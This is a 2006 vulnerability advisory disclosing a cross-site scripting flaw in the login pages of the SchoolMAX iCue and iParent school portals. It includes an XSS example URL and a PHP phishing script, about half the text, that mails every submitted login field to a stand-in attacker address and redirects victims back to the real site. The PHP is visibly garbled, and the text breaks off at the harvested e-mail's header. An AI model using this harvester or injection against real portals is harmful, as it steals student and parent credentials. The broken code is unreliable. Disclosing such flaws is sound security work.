|
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
The InfoGuard Group Vulnerability Summary 2006-04
Application: Maximus' iCue and iParent (http://www.schoolmax.net)
Versions: All
Bugs: Cross-Site Scripting (XSS)
Date: 18 June 2006
Author: Charles H.
E-mail: charles@infoguardgroup.com
Website: http://www.infoguardgroup.com
1) Introduction
SchoolMAX from MAXIMUS is one of the most technologically advanced
student information systems available today. It is district-based yet
still provides for school-based management capabilities and controls.
http://www.maximus.com/corporate/pages/SchoolMAX.asp
2)Login XSS
The login.asp file assocaited with SchoolMAX's iCue and iParent applications
suffers from a Cross-Site Scripting flaw. This can result in cookie and/or
credentials theft, especially if used in conjunction with a social
engineering attack. A simple attack against iCue might look like this::
https://icue.victimsite.us/toas/icue_login.asp?error_msg=These%20aren't%20the%20droids%20you're%20looking%20for
This will result in the message "These aren't the droids you're looking
for" being displayed.
This shows the basic idea of the XSS. You can perform various
obfuscation techniques to hide the message.
Additionally, when used in conjunction with social engineering,user
credentials can be easily obtained.:
If we take a php file like this:
"h@x0r@evil.net";
$header "https://iparent.victimsite.us:8443/iparent/sv_login_secure.asp?invalid_login=true&DST_NBR=&error_msg=Invalid%20login.&USER_NME=&ID=&AT=&SCHNBR=";
if ($_SERVER['REQUEST_METHOD'] != "POST"){exit;}
$disallowed_name = array(':',';',"'",'"','=','(',')','{','}','@');
foreach($disallowed_name as $value)
{
if(stristr($_POST[Name],$value)){header("location:
$_SERVER[HTTP_REFERER]");exit;}
}
$disallowed_email = array(':',';',"'",'"','=','(',')','{','}');
foreach($disallowed_email as $value)
{
if(stristr($_POST[Email],$value)){header("location:
$_SERVER[HTTP_REFERER]");exit;}
}
$message = "";
while(list($key,$value) each($_POST)){if(!(empty($value))){$set=1;}$message = $message . "$key:
$value\n\n";} if($set!==1){header("location: $_SERVER[HTTP_REFERER]");exit;}
$message = $message . "-- \nThank you for exploiting iParent";
$message = stripslashes($message);
$subject = "FormToEmail Comments";
$headers = "From: " . $_POST['Email'] . "\n" . "Return-Path: " .
$_POST['Email'] . "\n" . "Reply-To: " . $_POST['Email'] . "\n";
mail($my_email,$subject,$message,$headers);
header( "Location:
https://iparent.victimsite.us:8443/iparent/sv_login_secure.asp?invalid_login=true&DST_NBR=&error_msg=Invalid%20login.&USER_NME=&ID=&AT=&SCHNBR="
);
?>
Post it to some place, then send a forged e-mail which redirects to
this, we can capture the credentials. When we do,
here's what the attacker gets in the e-mail:
Subject: FormToEmail Comments
Date: Mon, 06 Mar 2006 21:48:05 -0900 (AKST)
From: Nobody